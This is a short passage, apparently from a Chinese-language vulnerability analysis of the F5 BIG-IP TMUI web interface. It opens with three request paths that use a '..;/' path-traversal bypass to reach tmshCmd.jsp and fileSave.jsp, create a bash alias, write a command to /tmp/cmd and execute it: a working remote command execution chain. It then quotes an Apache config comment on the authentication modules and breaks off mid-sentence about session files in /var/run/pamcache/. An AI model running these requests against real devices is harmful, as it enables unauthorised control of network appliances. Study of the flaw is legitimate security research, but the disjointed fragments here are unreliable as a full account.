/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create cli alias private list command bash /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list /tmp/cmd
# # This is the locationof the external APIs used by clients. # # The mod_auth_pam and mod_f5_auth_cookie packages have been modified # to recognize URLs under this pathandperform standard Basic # authentication (rather than forward to the UI login page). #
所以我们将这两个 Apache 扩展下载到本地,可以用 IDA 打开进行分析(但是 C++ 加上 Apache 函数,挺难看的),可以发现权限校验就是由 Apache 完成的,session 文件存放在 /var/run/pamcache/ 目录下,大致内容如下: